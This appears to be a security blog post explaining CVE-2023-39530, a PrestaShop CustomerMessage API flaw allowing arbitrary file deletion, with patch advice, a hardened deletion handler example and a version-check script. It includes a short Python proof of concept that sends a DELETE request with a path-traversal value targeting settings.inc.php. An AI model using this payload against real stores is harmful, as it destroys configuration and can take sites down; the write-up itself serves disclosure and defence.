CVE-2023-39530 - How a CustomerMessage API Bug Let Attackers Delete Files on PrestaShop (With Exploit Example)

PrestaShop is a popular open source e-commerce solution trusted by thousands of businesses. If your online store runs PrestaShop versions before 8.1.1, your server might be in danger because of a high-impact vulnerability tracked as CVE-2023-39530. This bug allows an attacker to delete any file on your server using a flaw in the CustomerMessage API—even if they aren’t an admin.

In this exclusive deep dive, we’ll explain what went wrong, how attackers can exploit this issue (with example code), and how you can protect your store. By the end, you’ll know why it’s critical to patch right now.

What is CVE-2023-39530?

CVE-2023-39530 is a security vulnerability in PrestaShop before version 8.1.1, specifically affecting the CustomerMessage API endpoint. This API is used to handle messages between store customers and admins.

Before the fix, someone could send a specially-crafted request to this endpoint, causing your server to delete arbitrary files—including critical data and config files.

Official Advisory:
- PrestaShop Security Advisory PSFSA-2023-001
- CVE Details Entry

How Does the Vulnerability Work?

The bug comes down to missing input validation when the API processed file references in customer messages.

Normally, when a customer uploads an attachment or sends a message, the API should operate only on the specific attachment files it manages. In vulnerable versions, the API accepted a client-supplied file reference without validating it, so the client could choose which file was deleted. As a result, an attacker could make the API delete ANY file on the server that the web server user has access to.

By exploiting this bug, an attacker could:

- Delete config files (/config/settings.inc.php), which could shut down your store.
- Delete .htaccess to bypass protections, or even plant a backdoor for further attacks.

It’s a high-impact vulnerability because deleting configuration or PHP files can break your store or open a path to full takeover.

Proof-of-Concept (Exploit Example)

WARNING: This is for educational purposes only. Only test on your own servers.

Suppose your PrestaShop is running at https://example.com, and the CustomerMessage API is at /api/customer_messages. The following code could be used to trick the API into deleting any file:

```python
import requests

# Replace these with your actual PrestaShop API URL and target file path
api_url = 'https://example.com/api/customer_messages'
target_file = '../../config/settings.inc.php'  # Adjust path as needed
message_id = 123  # Existing CustomerMessage ID

# An attacker would craft a payload referencing the file to be deleted
data = {
    'id_customer_message': message_id,
    'file_attachment': target_file  # Dangerous: improper validation lets attacker define this!
}

headers = {
    'Content-Type': 'application/json',
    'Authorization': 'Basic <BASE64-API-KEY-HERE>'  # Auth may not be enforced
}

# Make the malicious DELETE request
response = requests.delete(api_url, json=data, headers=headers)
print(response.status_code, response.text)
```

If the server is vulnerable, the targeted file (e.g. settings.inc.php) will be deleted.
*In some setups, authentication isn’t even needed depending on your API's configuration!*

How to Fix CVE-2023-39530

The Only Solution:
Upgrade PrestaShop to version 8.1.1 or higher. The patch ensures the API validates which files can be deleted, blocking unwanted operations.
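The kind of server-side check the fix is described as introducing, shown here as an added Python example that is not PrestaShop's own code (PrestaShop itself is written in PHP) and not a drop-in workaround. The design point: the client names a message, never a file. The server maps the message id to the attachment it recorded itself, and refuses anything that does not resolve to a plain file directly inside the upload directory. The MESSAGE_ATTACHMENTS table, the scratch directory layout and the stand-in settings file are constructed for the demo; the request field names mirror the payload shown on this page.

```python
import re
import tempfile
from pathlib import Path

# Constructed sample data: attachments the server knows about, keyed by
# customer-message id. In the hardened design the client never names a file;
# it only names a message, and the server decides which file that maps to.
MESSAGE_ATTACHMENTS = {
    123: "invoice_123.pdf",
    124: "photo_124.jpg",
    125: "../config/settings.inc.php",  # a tampered record, used to show step 2 below
}

# A server-generated attachment name is a single path segment: no '/', no leading '.'.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*$")


class AttachmentError(Exception):
    """The request does not map to a file the server is allowed to delete."""


def resolve_attachment(upload_root: Path, message_id: int) -> Path:
    """Map a message id to the one file that may be deleted for it.

    1. The filename comes from the server-side record, not from the request.
    2. The stored name must itself be one safe path segment.
    3. The fully resolved path must sit directly inside upload_root, which
       also catches a symlink in the upload directory pointing elsewhere.
    """
    name = MESSAGE_ATTACHMENTS.get(message_id)
    if name is None:
        raise AttachmentError(f"no attachment recorded for message {message_id}")
    if not SAFE_NAME.match(name):
        raise AttachmentError(f"stored filename {name!r} is not a plain segment")
    root = upload_root.resolve()
    candidate = (root / name).resolve()
    if candidate.parent != root:
        raise AttachmentError(f"{candidate} resolves outside {root}")
    return candidate


def delete_attachment(upload_root: Path, request: dict) -> Path:
    """Handle a delete request. A client-supplied 'file_attachment' field is
    ignored entirely; only 'id_customer_message' is consulted."""
    try:
        message_id = int(request["id_customer_message"])
    except (KeyError, TypeError, ValueError):
        raise AttachmentError("id_customer_message must be an integer") from None
    path = resolve_attachment(upload_root, message_id)
    if path.is_file():
        path.unlink()
    return path


def demo() -> dict:
    """Exercise the handler in a scratch directory laid out like a shop:
    <tmp>/upload holds attachments, <tmp>/config holds a stand-in settings file."""
    base = Path(tempfile.mkdtemp())
    upload = base / "upload"
    upload.mkdir()
    (upload / "invoice_123.pdf").write_bytes(b"constructed sample attachment")
    config = base / "config"
    config.mkdir()
    settings = config / "settings.inc.php"
    settings.write_text("<?php // constructed stand-in for a config file\n")

    results = {}

    # Legitimate request: names only the message; its own attachment goes away.
    delete_attachment(upload, {"id_customer_message": 123})
    results["legit_deleted"] = not (upload / "invoice_123.pdf").exists()

    # Request shaped like the page's payload: the file field is ignored, and
    # message 999 has no recorded attachment, so the handler refuses.
    try:
        delete_attachment(upload, {"id_customer_message": 999,
                                   "file_attachment": "../../config/settings.inc.php"})
        results["unknown_message_refused"] = False
    except AttachmentError:
        results["unknown_message_refused"] = True

    # Even a tampered server-side record cannot reach outside upload/.
    try:
        delete_attachment(upload, {"id_customer_message": 125})
        results["tampered_record_refused"] = False
    except AttachmentError:
        results["tampered_record_refused"] = True

    results["config_untouched"] = settings.is_file()
    return results


if __name__ == "__main__":
    print(demo())
```

The three layers are deliberate: ignoring the client's file field removes the bug class, the filename pattern protects against a corrupted record, and comparing the resolved parent directory protects against symlinks that an attacker might have planted in the upload directory by other means.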

PrestaShop Security Patch Info:

https://github.com/PrestaShop/PrestaShop/releases/tag/8.1.1

No workaround is available—the vulnerability is inside the code logic.

- Check your version: confirm your store is running PrestaShop 8.1.1 or later.
- Patch now: always update to the official release.
- Restrict the API: limit access to /api/customer_messages with a firewall, or close it if you don’t use it.
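An added example for the "check your version" step, not part of this page or of PrestaShop: it compares an installed version numerically against 8.1.1, so that 8.1.10 is correctly treated as patched while 8.1.0 and 1.7.x are not (a plain string comparison gets 8.1.10 wrong). The assumption that PrestaShop 8 declares its version as a `const VERSION = '...'` line in app/AppKernel.php is mine; the sample source text below is constructed, so check the file in your own install before relying on the path.

```python
import re
from pathlib import Path

# Lowest release this page reports as fixed.
FIXED_VERSION = "8.1.1"

# Assumption (not confirmed by the page): PrestaShop 8 keeps its version in
# app/AppKernel.php as `const VERSION = '8.x.y';`. Adjust if your layout differs.
VERSION_FILE = Path("app") / "AppKernel.php"
VERSION_PATTERN = re.compile(r"const\s+VERSION\s*=\s*['\"]([0-9][0-9.]*)['\"]")


def parse_version(text: str) -> tuple:
    """Turn '8.1.10' into (8, 1, 10) so that tuple comparison orders releases
    numerically rather than lexically."""
    parts = text.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a numeric version: {text!r}")
    return tuple(int(p) for p in parts)


def version_from_kernel_source(source: str) -> str:
    """Extract the VERSION constant from AppKernel.php contents."""
    match = VERSION_PATTERN.search(source)
    if match is None:
        raise ValueError("VERSION constant not found in source")
    return match.group(1)


def is_vulnerable(version: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the installed version predates the fixed release."""
    return parse_version(version) < parse_version(fixed)


def check_source(source: str) -> dict:
    """Assess a copy of AppKernel.php contents."""
    version = version_from_kernel_source(source)
    return {"version": version, "vulnerable": is_vulnerable(version)}


def check_install(shop_root: Path) -> dict:
    """Assess a PrestaShop install rooted at shop_root (reads the assumed file)."""
    source = (shop_root / VERSION_FILE).read_text(encoding="utf-8")
    return check_source(source)


# Constructed sample of what the relevant lines of AppKernel.php might look like.
SAMPLE_KERNEL = "class AppKernel extends Kernel\n{\n    const VERSION = '8.1.0';\n"

if __name__ == "__main__":
    print(check_source(SAMPLE_KERNEL))  # constructed sample reports vulnerable
```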

References

- NVD: CVE-2023-39530
- PrestaShop Advisory GHSA-6p3r-5p6x-5gw4
- PrestaShop Patch Release 8.1.1

Final Thoughts

CVE-2023-39530 is a stark reminder that even trusted, open source software can be vulnerable in subtle ways. If you haven’t already, update PrestaShop to 8.1.1 or later — and always keep an eye on your shop’s security advisories.

Online attackers move fast. With code this simple, any PrestaShop site can be targeted in minutes once it's public. Don’t let your store be the next headline!

---
*Feel free to share or use these details for patching and awareness. For questions or further help, consult PrestaShop’s official documentation or security team.*

Timeline

Published on: 08/07/2023 21:15:00 UTC
Last modified on: 08/09/2023 19:36:00 UTC